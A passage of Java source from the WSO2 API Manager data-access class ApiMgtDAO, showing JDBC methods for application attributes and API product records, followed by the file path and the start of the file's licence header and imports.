int[] update = ps.executeBatch(); } } catch (SQLException e) { handleException("Error in adding attributes of application with id: " + applicationId , e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } } /** * Get all attributes stored against an Application * * @param conn Database connection * @param applicationId * @throws APIManagementException */ public Map<String, String> getApplicationAttributes(Connection conn, int applicationId) throws APIManagementException { PreparedStatement ps = null; ResultSet rs = null; Map<String, String> applicationAttributes = new HashMap<>(); try { ps = conn.prepareStatement(SQLConstants.GET_APPLICATION_ATTRIBUTES_BY_APPLICATION_ID); ps.setInt(1, applicationId); rs = ps.executeQuery(); while (rs.next()) { applicationAttributes.put(rs.getString("NAME"), rs.getString("VALUE")); } } catch (SQLException e) { handleException("Error when reading attributes of application with id: " + applicationId, e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, rs); } return applicationAttributes; } /** * Delete certain attribute stored against an Application * * @param attributeKey User defined key of attribute * @param applicationId * @throws APIManagementException */ public void deleteApplicationAttributes(String attributeKey, int applicationId) throws APIManagementException { Connection connection = null; PreparedStatement ps = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(SQLConstants.REMOVE_APPLICATION_ATTRIBUTES_BY_ATTRIBUTE_NAME_SQL); ps.setString(1, attributeKey); ps.setInt(2, applicationId); ps.execute(); connection.commit(); } catch (SQLException e) { handleException("Error in establishing SQL connection ", e); } finally { APIMgtDBUtil.closeAllConnections(ps, connection, null); } } /** * Add new attributes against an Application in API Store * * @param applicationAttributes Map of key, value pair of attributes * @param applicationId Id of Application against which attributes are getting stored * @param tenantId Id of tenant * @throws APIManagementException */ public void addApplicationAttributes(Map<String, String> applicationAttributes, int applicationId, int tenantId) throws APIManagementException { Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); addApplicationAttributes(connection, applicationAttributes, applicationId, tenantId); connection.commit(); } catch (SQLException sqlException) { if (connection != null) { try { connection.rollback(); } catch (SQLException e) { log.error("Failed to rollback add application attributes ", e); } } handleException("Failed to add Application", sqlException); } finally { APIMgtDBUtil.closeAllConnections(null, connection, null); } } /** * Converts all null values for THROTTLING_TIER in AM_API_URL_MAPPING table, to Unlimited. * This will be executed only during startup of the server. * * @throws APIManagementException */ public void convertNullThrottlingTiers() throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; String query = SQLConstants.FIX_NULL_THROTTLING_TIERS; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmt = connection.prepareStatement(query); prepStmt.execute(); connection.commit(); } catch (SQLException e) { handleException( "Error occurred while converting NULL throttling tiers to Unlimited in AM_API_URL_MAPPING table", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, null); } } /** * Retrieves the Application which is corresponding to the given UUID String * * @param subscriberId subscriberId of the Application * @param applicationName name of the Application * @return * @throws APIManagementException */ public Application getApplicationBySubscriberIdAndName(int subscriberId, String applicationName) throws APIManagementException { Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; int applicationId = 0; Application application = null; try { connection = APIMgtDBUtil.getConnection(); String query = SQLConstants.GET_APPLICATION_BY_SUBSCRIBERID_AND_NAME_SQL; prepStmt = connection.prepareStatement(query); prepStmt.setInt(1, subscriberId); prepStmt.setString(2, applicationName); rs = prepStmt.executeQuery(); if (rs.next()) { String subscriberName = rs.getString("USER_ID"); Subscriber subscriber = new Subscriber(subscriberName); subscriber.setId(subscriberId); application = new Application(applicationName, subscriber); application.setDescription(rs.getString("DESCRIPTION")); application.setStatus(rs.getString("APPLICATION_STATUS")); application.setCallbackUrl(rs.getString("CALLBACK_URL")); applicationId = rs.getInt("APPLICATION_ID"); application.setId(applicationId); application.setGroupId(rs.getString("GROUP_ID")); application.setUUID(rs.getString("UUID")); application.setTier(rs.getString("APPLICATION_TIER")); application.setTokenType(rs.getString("TOKEN_TYPE")); subscriber.setId(rs.getInt("SUBSCRIBER_ID")); if (multiGroupAppSharingEnabled) { if (application.getGroupId().isEmpty()) { application.setGroupId(getGroupId(application.getId())); } } Timestamp createdTime = rs.getTimestamp("CREATED_TIME"); application.setCreatedTime(createdTime == null ? null : String.valueOf(createdTime.getTime())); try { Timestamp updated_time = rs.getTimestamp("UPDATED_TIME"); application.setLastUpdatedTime( updated_time == null ? null : String.valueOf(updated_time.getTime())); } catch (SQLException e) { application.setLastUpdatedTime(application.getCreatedTime()); } } if (application != null) { Map<String, String> applicationAttributes = getApplicationAttributes(connection, applicationId); application.setApplicationAttributes(applicationAttributes); } } catch (SQLException e) { handleException("Error while obtaining details of the Application : " + applicationName + " of " + subscriberId, e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return application; } /** * Retrieve URI Templates for the given API * @param api API * @return Map of URITemplate with key as Method:resourcepath * @throws APIManagementException exception */ public Map<String, URITemplate> getURITemplatesForAPI(API api) throws APIManagementException { Map<String, URITemplate> templatesMap = new HashMap<String, URITemplate>(); Connection connection = null; PreparedStatement prepStmt = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); //TODO move to constant String query = "SELECT URL_PATTERN , URL_MAPPING_ID, HTTP_METHOD FROM AM_API API , AM_API_URL_MAPPING URL " + "WHERE API.API_ID = URL.API_ID AND API.API_NAME =? " + "AND API.API_VERSION=? AND API.API_PROVIDER=?"; prepStmt = connection.prepareStatement(query); prepStmt.setString(1, api.getId().getApiName()); prepStmt.setString(2, api.getId().getVersion()); prepStmt.setString(3, APIUtil.replaceEmailDomainBack(api.getId().getProviderName())); rs = prepStmt.executeQuery(); while (rs.next()) { URITemplate template = new URITemplate(); String urlPattern = rs.getString("URL_PATTERN"); String httpMethod = rs.getString("HTTP_METHOD"); template.setHTTPVerb(httpMethod); template.setResourceURI(urlPattern); template.setId(rs.getInt("URL_MAPPING_ID")); //TODO populate others if needed templatesMap.put(httpMethod + ":" + urlPattern, template); } } catch (SQLException e) { handleException("Error while obtaining details of the URI Template for api " + api.getId() , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmt, connection, rs); } return templatesMap; } public void addAPIProduct(APIProduct apiproduct, String tenantDomain) throws APIManagementException { Connection connection = null; PreparedStatement prepStmtAddAPIProduct = null; PreparedStatement prepStmtAddResourceMapping = null; PreparedStatement prepStmtAddScopeEntry = null; PreparedStatement prepStmtAddScopeLink = null; PreparedStatement prepStmtAddScopeResourceMapping = null; ResultSet rs = null; int productId = 0; int scopeId = 0; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); //TODO move to constant :version? String queryAddAPIProduct = "INSERT INTO " + "AM_API_PRODUCT(API_PRODUCT_PROVIDER,API_PRODUCT_NAME," + "DESCRIPTION, API_PRODUCT_TIER,CREATED_BY," + "VISIBILITY,SUBSCRIPTION_AVAILABILITY,UUID,TENANT_DOMAIN,STATE,API_PRODUCT_VERSION) " + "VALUES (?,?,?,?,?,?,?,?,?,?,?)"; prepStmtAddAPIProduct = connection.prepareStatement(queryAddAPIProduct, new String[]{"api_product_id"}); prepStmtAddAPIProduct.setString(1, apiproduct.getProvider()); prepStmtAddAPIProduct.setString(2, apiproduct.getName()); prepStmtAddAPIProduct.setString(3, apiproduct.getDescription()); prepStmtAddAPIProduct.setString(4, apiproduct.getProductTier()); prepStmtAddAPIProduct.setString(5, apiproduct.getProvider()); //TODO get the created user prepStmtAddAPIProduct.setString(6, apiproduct.getVisibility()); prepStmtAddAPIProduct.setString(7, apiproduct.getSubscriptionAvailability()); prepStmtAddAPIProduct.setString(8, apiproduct.getUuid()); prepStmtAddAPIProduct.setString(9, tenantDomain); prepStmtAddAPIProduct.setString(10, apiproduct.getState() == null? "CREATED" : apiproduct.getState()); //TODO move to constant prepStmtAddAPIProduct.setString(11, "0"); //TODO move to constant prepStmtAddAPIProduct.execute(); rs = prepStmtAddAPIProduct.getGeneratedKeys(); if (rs.next()) { productId = rs.getInt(1); } //breaks the flow if product is not added to the db correctly if(productId == 0) { throw new APIManagementException("Error while adding API product " + apiproduct.getUuid()); } //add product scope //TODO finalize format and move to constants String productScopeKey = "productscope-" + apiproduct.getName() + ":" +apiproduct.getProvider(); //for now use key for display name as well TODO check and modify String productScopeDisplayName = productScopeKey; Scope productScope = new Scope(); productScope.setKey(productScopeKey); productScope.setName(productScopeDisplayName); String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; prepStmtAddScopeEntry = connection.prepareStatement(queryAddScopeEntry, new String[]{"scope_id"}); prepStmtAddScopeEntry.setString(1, productScope.getKey()); prepStmtAddScopeEntry.setString(2, productScope.getName()); prepStmtAddScopeEntry.setString(3, productScope.getDescription()); prepStmtAddScopeEntry.setInt(4, APIUtil.getTenantIdFromTenantDomain(tenantDomain)); prepStmtAddScopeEntry.execute(); rs = prepStmtAddScopeEntry.getGeneratedKeys(); if (rs.next()){ scopeId = rs.getInt(1); } //breaks the flow if product scope is not added to the db correctly if (scopeId == 0) { throw new APIManagementException("Error while adding scope for API product : " + apiproduct.getUuid()); } productScope.setId(scopeId); //add scope - api mapping String scopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; prepStmtAddScopeLink = connection.prepareStatement(scopeLink); //TODO move to constant String queryAddResourceMapping = "INSERT INTO AM_API_PRODUCT_MAPPING (API_PRODUCT_ID,URL_MAPPING_ID) " + "VALUES (?, ?)"; prepStmtAddResourceMapping = connection.prepareStatement(queryAddResourceMapping); String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; prepStmtAddScopeResourceMapping = connection.prepareStatement(queryAddScopeResourceMapping); //add the resources in each API in the API product. Add the resource_ma List<APIProductResource> productApis = apiproduct.getProductResources(); for (APIProductResource apiProductResource : productApis) { APIIdentifier apiIdentifier = apiProductResource.getApiIdentifier(); int apiID = getAPIID(apiIdentifier, connection); prepStmtAddScopeLink.setInt(1, apiID); prepStmtAddScopeLink.setInt(2, scopeId); prepStmtAddScopeLink.addBatch(); List<URITemplate> uriTemplates = apiProductResource.getResources(); for (URITemplate uriTemplate : uriTemplates) { prepStmtAddResourceMapping.setInt(1, productId); prepStmtAddResourceMapping.setInt(2, uriTemplate.getId()); prepStmtAddResourceMapping.addBatch(); //add scope uri temaplate mapping String resourceKey = APIUtil .getResourceKey(getAPIContext(apiIdentifier), apiIdentifier.getVersion(), uriTemplate.getResourceURI(), uriTemplate.getHTTPVerb()); prepStmtAddScopeResourceMapping.setString(1, resourceKey); prepStmtAddScopeResourceMapping.setInt(2, scopeId); prepStmtAddScopeResourceMapping.setInt(3, APIUtil.getTenantIdFromTenantDomain(tenantDomain)); prepStmtAddScopeResourceMapping.addBatch(); } } prepStmtAddScopeLink.executeBatch(); prepStmtAddScopeLink.clearBatch(); prepStmtAddResourceMapping.executeBatch(); prepStmtAddResourceMapping.clearBatch(); prepStmtAddScopeResourceMapping.executeBatch(); prepStmtAddScopeResourceMapping.clearBatch(); connection.commit(); } catch (SQLException e) { handleException("Error while adding API product " + apiproduct.getName() + " of provider " + apiproduct.getProvider(), e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddAPIProduct, null, null); APIMgtDBUtil.closeAllConnections(prepStmtAddResourceMapping, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeEntry, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeLink, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeResourceMapping, connection, null); } } public APIProduct getAPIProduct(String uuid) throws APIManagementException { APIProduct product = new APIProduct(); Connection connection = null; PreparedStatement prepStmtGetAPIProduct = null; PreparedStatement prepStmtGetAPIProductResource = null; ResultSet rs = null; ResultSet rs2 = null; try { connection = APIMgtDBUtil.getConnection(); //TODO check this //TODO move to constant String queryGetAPIProduct = "SELECT API_PRODUCT_ID,UUID,DESCRIPTION,API_PRODUCT_PROVIDER,API_PRODUCT_NAME,API_PRODUCT_TIER,VISIBILITY,BUSINESS_OWNER,BUSINESS_OWNER_EMAIL,SUBSCRIPTION_AVAILABILITY,STATE FROM AM_API_PRODUCT WHERE UUID = ?"; int productId = 0; prepStmtGetAPIProduct = connection.prepareStatement(queryGetAPIProduct); prepStmtGetAPIProduct.setString(1, uuid); rs = prepStmtGetAPIProduct.executeQuery(); if (rs.next()) { product.setUuid(rs.getString("UUID")); product.setDescription(rs.getString("DESCRIPTION")); product.setProvider(rs.getString("API_PRODUCT_PROVIDER")); product.setName(rs.getString("API_PRODUCT_NAME")); product.setProductTier(rs.getString("API_PRODUCT_TIER")); product.setVisibility(rs.getString("VISIBILITY")); product.setBusinessOwner(rs.getString("BUSINESS_OWNER")); product.setBusinessOwnerEmail(rs.getString("BUSINESS_OWNER_EMAIL")); product.setSubscriptionAvailability(rs.getString("SUBSCRIPTION_AVAILABILITY")); product.setState(rs.getString("STATE")); productId = rs.getInt("API_PRODUCT_ID"); } //get api resources related to api product //TODO move to constant String queryListProductResourceMapping = "SELECT API_NAME, API_PROVIDER , API_VERSION ,T1.API_ID ,API_PRODUCT_ID, HTTP_METHOD, URL_PATTERN, " + "T1.URL_MAPPING_ID " + "FROM " + "(SELECT API_NAME ,API_PROVIDER, API_VERSION, API.API_ID,URL.URL_MAPPING_ID " + "FROM AM_API_URL_MAPPING URL, AM_API API " + "WHERE API.API_ID = URL.API_ID) T1 " + "INNER JOIN " + "(SELECT API_PRODUCT_ID, HTTP_METHOD, URL_PATTERN, URL.URL_MAPPING_ID " + "FROM AM_API_PRODUCT_MAPPING PRODUCT, AM_API_URL_MAPPING URL " + "WHERE URL.URL_MAPPING_ID = PRODUCT.URL_MAPPING_ID AND API_PRODUCT_ID =? ) T2 " + "ON " + "(T1.URL_MAPPING_ID =T2.URL_MAPPING_ID )"; prepStmtGetAPIProductResource = connection.prepareStatement(queryListProductResourceMapping); prepStmtGetAPIProductResource.setInt(1, productId); //keep a temporary map for each resources for each api in the product Map<String, APIProductResource> resourceMap = new HashMap<String, APIProductResource>(); String apiId = ""; rs2 = prepStmtGetAPIProductResource.executeQuery(); while (rs2.next()) { apiId = rs2.getString("API_ID"); APIProductResource resource; if (resourceMap.containsKey(apiId)) { resource = resourceMap.get(apiId); } else { resource = new APIProductResource(); resource.setApiName(rs2.getString("API_NAME")); APIIdentifier identifier = new APIIdentifier(rs2.getString("API_PROVIDER"), rs2.getString("API_NAME"), rs2.getString("API_VERSION")); resource.setApiId(identifier.toString()); // TODO set API UUID resource.setApiIdentifier(identifier); } URITemplate template = new URITemplate(); template.setHTTPVerb(rs2.getString("HTTP_METHOD")); template.setResourceURI(rs2.getString("URL_PATTERN")); template.setId(rs2.getInt("URL_MAPPING_ID")); resource.setResource(template); resourceMap.put(apiId, resource); } product.setProductResources(new ArrayList<APIProductResource>(resourceMap.values())); } catch (SQLException e) { handleException("Error while retrieving api product for UUID " + uuid , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProduct, null, rs); APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProductResource, connection, rs2); } return product; } public List<APIProduct> getAPIProductsForTenantDomain(String tenantDomain) throws APIManagementException { List<APIProduct> productList = new ArrayList<APIProduct>(); Connection connection = null; PreparedStatement prepStmtGetAPIProduct = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); //TODO move to constant String queryGetAPIProduct = "SELECT API_PRODUCT_ID,UUID,DESCRIPTION,API_PRODUCT_PROVIDER,API_PRODUCT_NAME,API_PRODUCT_TIER,VISIBILITY,BUSINESS_OWNER,BUSINESS_OWNER_EMAIL,SUBSCRIPTION_AVAILABILITY,TENANT_DOMAIN,STATE FROM AM_API_PRODUCT WHERE TENANT_DOMAIN = ?"; prepStmtGetAPIProduct = connection.prepareStatement(queryGetAPIProduct); prepStmtGetAPIProduct.setString(1, tenantDomain); rs = prepStmtGetAPIProduct.executeQuery(); while (rs.next()) { APIProduct product = new APIProduct(); //only send a product.setName(rs.getString("API_PRODUCT_NAME")); product.setUuid(rs.getString("UUID")); product.setProvider(rs.getString("API_PRODUCT_PROVIDER")); product.setState(rs.getString("STATE")); productList.add(product); } } catch (SQLException e) { handleException("Error while retrieving api product for tenant " + tenantDomain , e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtGetAPIProduct, connection, rs); } return productList; } public void deleteAPIProduct(String uuid, String tenantDomain) throws APIManagementException { String deleteQuery = "DELETE FROM AM_API_PRODUCT WHERE UUID = ? AND TENANT_DOMAIN = ?"; PreparedStatement ps = null; Connection connection = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); ps = connection.prepareStatement(deleteQuery); ps.setString(1, uuid); ps.setString(2, tenantDomain); ps.executeUpdate(); connection.commit(); } catch (SQLException e) { handleException("Error while deleting api product " + uuid + " tenant " + tenantDomain , e); } finally { APIMgtDBUtil.closeAllConnections(ps, null, null); } } private void deleteProductMappingsForAPI(API api, List<APIProduct> apiProducts) throws APIManagementException { Connection connection = null; PreparedStatement preparedStatement = null; String querydeleteProductMappingsForAPI = "DELETE FROM AM_API_PRODUCT_MAPPING WHERE URL_MAPPING_ID = ?"; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); preparedStatement = connection.prepareStatement(querydeleteProductMappingsForAPI); for (APIProduct apiProduct : apiProducts) { List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { if (productResource.getApiIdentifier().equals(api.getId())) { //TODO: check and modify to use UUID List<URITemplate> mappedAPIResources = productResource.getResources(); if (mappedAPIResources.size() > 0 && log.isDebugEnabled()) { log.debug( "Removing url mappings from API : " + api.getId().toString() + " on API product : " + apiProduct.getName()); } for (URITemplate template : mappedAPIResources) { preparedStatement.setInt(1, template.getId()); preparedStatement.addBatch(); } } } } preparedStatement.executeBatch(); preparedStatement.clearBatch(); connection.commit(); } catch (SQLException e) { if (connection != null) { try { connection.rollback(); } catch (SQLException e1) { handleException("Error occurred while Rolling back changes done on API product mapping updating", e1); } } handleException("Error occured while removing url template mappings from API " + api.getId().toString() + " on API Products.", e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, connection, null); } } private void addProductMappingsForAPI(API api, List<APIProduct> apiProducts) throws APIManagementException { Connection connection = null; String queryAddProductResourceMappings = "INSERT INTO AM_API_PRODUCT_MAPPING (API_PRODUCT_ID,URL_MAPPING_ID) " + "VALUES (?, ?)"; String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String queryAddcopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; PreparedStatement prepStmtAddProductResourceMappings = null; try { connection = APIMgtDBUtil.getConnection(); connection.setAutoCommit(false); prepStmtAddProductResourceMappings = connection.prepareStatement(queryAddProductResourceMappings); //get previously added resources and re-add them to product with new URL_MAPPING_ID Map<String, URITemplate> templateMap = getURITemplatesForAPI(api); int productId; for (APIProduct apiProduct : apiProducts) { productId = getAPIProductId(apiProduct.getName(), apiProduct.getProvider(), null); List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { if (api.getId().equals(productResource.getApiIdentifier())) { List<URITemplate> templates = productResource.getResources(); for (URITemplate template : templates) { String key = template.getHTTPVerb() + ":" + template.getResourceURI(); if (templateMap.containsKey(key)) { //update api template mapping id template.setId(templateMap.get(key).getId()); //add record to database back with new ID prepStmtAddProductResourceMappings.setInt(1, productId); prepStmtAddProductResourceMappings.setInt(2, template.getId()); prepStmtAddProductResourceMappings.addBatch(); } else { //ToDo : what if the resource had been deleted while updating API log.info("Resource " + key + " was deleted from API " + api.getId().toString() + " while updating the API. So it is no longer available with API product " + apiProduct.getName()); } } } } } prepStmtAddProductResourceMappings.executeBatch(); prepStmtAddProductResourceMappings.clearBatch(); connection.commit(); } catch (SQLException e) { } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddProductResourceMappings, connection, null); } } private int getAPIProductId(String productName, String provider, String version) throws APIManagementException { Connection conn = null; //TODO: move query to constants. Use version for now I am not using version in the query since it is still set to null String queryGetProductId = "SELECT API_PRODUCT_ID FROM AM_API_PRODUCT WHERE API_PRODUCT_NAME = ? AND " + "API_PRODUCT_PROVIDER = ?"; PreparedStatement preparedStatement = null; ResultSet rs = null; int productId = -1; try { conn = APIMgtDBUtil.getConnection(); preparedStatement = conn.prepareStatement(queryGetProductId); preparedStatement.setString(1, productName); preparedStatement.setString(2, provider); rs = preparedStatement.executeQuery(); if (rs.next()) { productId = rs.getInt("API_PRODUCT_ID"); } if (productId == -1) { String msg = "Unable to find the API Product : " + productId + " in the database"; log.error(msg); throw new APIManagementException(msg); } } catch (SQLException e) { handleException("Error while retrieving api product id for product " + productName + " by " + provider, e); } finally { APIMgtDBUtil.closeAllConnections(preparedStatement, conn, rs); } return productId; } private void addProductScopes(List<APIProduct> apiProducts, int tenantID) throws APIManagementException { Connection connection = null; String queryAddScopeEntry = SQLConstants.ADD_SCOPE_ENTRY_SQL; String queryAddcopeLink = SQLConstants.ADD_SCOPE_LINK_SQL; String queryAddScopeResourceMapping = SQLConstants.ADD_OAUTH2_RESOURCE_SCOPE_SQL; PreparedStatement prepStmtAddScopeEntry = null; PreparedStatement prepStmtAddcopeLink = null; PreparedStatement prepStmtAddScopeResourceMapping = null; ResultSet rs = null; try { connection = APIMgtDBUtil.getConnection(); prepStmtAddScopeEntry = connection.prepareStatement(queryAddScopeEntry, new String[] { "scope_id" }); prepStmtAddcopeLink = connection.prepareStatement(queryAddcopeLink); prepStmtAddScopeResourceMapping = connection.prepareStatement(queryAddScopeResourceMapping); for (APIProduct apiProduct : apiProducts) { //add product scope //TODO finalize format and move to constants String productScopeKey = "productscope-" + apiProduct.getName() + ":" + apiProduct.getProvider(); //for now use key for display name as well TODO check and modify String productScopeDisplayName = productScopeKey; Scope productScope = new Scope(); productScope.setKey(productScopeKey); productScope.setName(productScopeDisplayName); int scopeId = 0; prepStmtAddScopeEntry.setString(1, productScope.getKey()); prepStmtAddScopeEntry.setString(2, productScope.getName()); prepStmtAddScopeEntry.setString(3, productScope.getDescription()); prepStmtAddScopeEntry.setInt(4, tenantID); prepStmtAddScopeEntry.execute(); rs = prepStmtAddScopeEntry.getGeneratedKeys(); if (rs.next()) { scopeId = rs.getInt(1); } //breaks the flow if product scope is not added to the db correctly if (scopeId == 0) { throw new APIManagementException( "Error while adding scope for API product : " + apiProduct.getUuid()); } productScope.setId(scopeId); //attach product scope to each resource api List<APIProductResource> productResources = apiProduct.getProductResources(); for (APIProductResource productResource : productResources) { APIIdentifier apiIdentifier = productResource.getApiIdentifier(); prepStmtAddcopeLink.setInt(1, getAPIID(apiIdentifier, connection)); prepStmtAddcopeLink.setInt(2, scopeId); prepStmtAddcopeLink.addBatch(); //attach product scope to resource mappings List<URITemplate> templates = productResource.getResources(); for (URITemplate template : templates) { //add scope uri temaplate mapping String resourceKey = APIUtil .getResourceKey(getAPIContext(apiIdentifier), apiIdentifier.getVersion(), template.getResourceURI(), template.getHTTPVerb()); prepStmtAddScopeResourceMapping.setString(1, resourceKey); prepStmtAddScopeResourceMapping.setInt(2, scopeId); prepStmtAddScopeResourceMapping.setInt(3, tenantID); prepStmtAddScopeResourceMapping.addBatch(); } } } prepStmtAddcopeLink.executeBatch(); prepStmtAddcopeLink.clearBatch(); prepStmtAddScopeResourceMapping.executeBatch(); prepStmtAddScopeResourceMapping.clearBatch(); connection.commit(); } catch (SQLException e) { handleException("Error while adding product resource and scope mappings for api product ", e); } finally { APIMgtDBUtil.closeAllConnections(prepStmtAddScopeEntry, connection, rs); APIMgtDBUtil.closeAllConnections(prepStmtAddcopeLink, connection, null); APIMgtDBUtil.closeAllConnections(prepStmtAddScopeResourceMapping, connection, null); } } }
components/apimgt/org.wso2.carbon.apimgt.impl/src/main/java/org/wso2/carbon/apimgt/impl/dao/ApiMgtDAO.java
/* * Copyright (c) 2005-2011, WSO2 Inc. (http://www.wso2.org) All Rights Reserved. * * WSO2 Inc. licenses this file to you under the Apache License, * Version 2.0 (the "License"); you may not use this file except * in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.wso2.carbon.apimgt.impl.dao; import com.google.common.base.Splitter; import com.google.common.collect.Lists; import org.apache.commons.lang.StringUtils; import org.apache.commons.logging.Log; import org.apache.commons.logging.LogFactory; import org.wso2.carbon.apimgt.api.APIManagementException; import org.wso2.carbon.apimgt.api.BlockConditionAlreadyExistsException; import org.wso2.carbon.apimgt.api.SubscriptionAlreadyExistingException; import org.wso2.carbon.apimgt.api.dto.ConditionDTO; import org.wso2.carbon.apimgt.api.dto.ConditionGroupDTO; import org.wso2.carbon.apimgt.api.dto.UserApplicationAPIUsage; import org.wso2.carbon.apimgt.api.model.API; import org.wso2.carbon.apimgt.api.model.APIIdentifier; import org.wso2.carbon.apimgt.api.model.APIKey; import org.wso2.carbon.apimgt.api.model.APIProduct; import org.wso2.carbon.apimgt.api.model.APIProductIdentifier; import org.wso2.carbon.apimgt.api.model.APIProductResource; import org.wso2.carbon.apimgt.api.model.APIStatus; import org.wso2.carbon.apimgt.api.model.APIStore; import org.wso2.carbon.apimgt.api.model.AccessTokenInfo; import org.wso2.carbon.apimgt.api.model.Application; import org.wso2.carbon.apimgt.api.model.ApplicationConstants; import org.wso2.carbon.apimgt.api.model.BlockConditionsDTO; import org.wso2.carbon.apimgt.api.model.Comment; import org.wso2.carbon.apimgt.api.model.KeyManager; import org.wso2.carbon.apimgt.api.model.Label; import org.wso2.carbon.apimgt.api.model.LifeCycleEvent; import org.wso2.carbon.apimgt.api.model.OAuthAppRequest; import org.wso2.carbon.apimgt.api.model.OAuthApplicationInfo; import org.wso2.carbon.apimgt.api.model.Scope; import org.wso2.carbon.apimgt.api.model.SubscribedAPI; import org.wso2.carbon.apimgt.api.model.Subscriber; import org.wso2.carbon.apimgt.api.model.Tier; import org.wso2.carbon.apimgt.api.model.URITemplate; import org.wso2.carbon.apimgt.api.model.policy.APIPolicy; import org.wso2.carbon.apimgt.api.model.policy.ApplicationPolicy; import org.wso2.carbon.apimgt.api.model.policy.BandwidthLimit; import org.wso2.carbon.apimgt.api.model.policy.Condition; import org.wso2.carbon.apimgt.api.model.policy.GlobalPolicy; import org.wso2.carbon.apimgt.api.model.policy.HeaderCondition; import org.wso2.carbon.apimgt.api.model.policy.IPCondition; import org.wso2.carbon.apimgt.api.model.policy.JWTClaimsCondition; import org.wso2.carbon.apimgt.api.model.policy.Pipeline; import org.wso2.carbon.apimgt.api.model.policy.Policy; import org.wso2.carbon.apimgt.api.model.policy.PolicyConstants; import org.wso2.carbon.apimgt.api.model.policy.QueryParameterCondition; import org.wso2.carbon.apimgt.api.model.policy.QuotaPolicy; import org.wso2.carbon.apimgt.api.model.policy.RequestCountLimit; import org.wso2.carbon.apimgt.api.model.policy.SubscriptionPolicy; import org.wso2.carbon.apimgt.impl.APIConstants; import org.wso2.carbon.apimgt.impl.APIManagerConfiguration; import org.wso2.carbon.apimgt.impl.ThrottlePolicyConstants; import org.wso2.carbon.apimgt.impl.dao.constants.SQLConstants; import org.wso2.carbon.apimgt.impl.dto.APIInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APIKeyInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APIKeyValidationInfoDTO; import org.wso2.carbon.apimgt.impl.dto.APISubscriptionInfoDTO; import org.wso2.carbon.apimgt.impl.dto.ApplicationRegistrationWorkflowDTO; import org.wso2.carbon.apimgt.impl.dto.TierPermissionDTO; import org.wso2.carbon.apimgt.impl.dto.WorkflowDTO; import org.wso2.carbon.apimgt.impl.factory.KeyManagerHolder; import org.wso2.carbon.apimgt.impl.factory.SQLConstantManagerFactory; import org.wso2.carbon.apimgt.impl.internal.ServiceReferenceHolder; import org.wso2.carbon.apimgt.impl.utils.APIMgtDBUtil; import org.wso2.carbon.apimgt.impl.utils.APIUtil; import org.wso2.carbon.apimgt.impl.utils.APIVersionComparator; import org.wso2.carbon.apimgt.impl.utils.ApplicationUtils; import org.wso2.carbon.apimgt.impl.utils.LRUCache; import org.wso2.carbon.apimgt.impl.utils.RemoteUserManagerClient; import org.wso2.carbon.apimgt.impl.workflow.WorkflowConstants; import org.wso2.carbon.apimgt.impl.workflow.WorkflowExecutorFactory; import org.wso2.carbon.apimgt.impl.workflow.WorkflowStatus; import org.wso2.carbon.core.util.CryptoException; import org.wso2.carbon.identity.core.util.IdentityTenantUtil; import org.wso2.carbon.identity.core.util.IdentityUtil; import org.wso2.carbon.identity.oauth.IdentityOAuthAdminException; import org.wso2.carbon.user.core.util.UserCoreUtil; import org.wso2.carbon.utils.DBUtils; import org.wso2.carbon.utils.multitenancy.MultitenantConstants; import org.wso2.carbon.utils.multitenancy.MultitenantUtils; import java.io.ByteArrayInputStream; import java.io.IOException; import java.io.InputStream; import java.math.BigDecimal; import java.nio.charset.Charset; import java.sql.Connection; import java.sql.PreparedStatement; import java.sql.ResultSet; import java.sql.SQLException; import java.sql.Statement; import java.sql.Timestamp; import java.sql.Types; import java.util.ArrayList; import java.util.Arrays; import java.util.Calendar; import java.util.Collections; import java.util.Comparator; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.LinkedHashMap; import java.util.LinkedHashSet; import java.util.List; import java.util.Map; import java.util.Set; import java.util.TreeMap; import java.util.TreeSet; import java.util.UUID; import java.util.regex.Matcher; import java.util.regex.Pattern; /** * This class represent the ApiMgtDAO. */ public class ApiMgtDAO { private static final Log log = LogFactory.getLog(ApiMgtDAO.class); private static ApiMgtDAO INSTANCE = null; private boolean 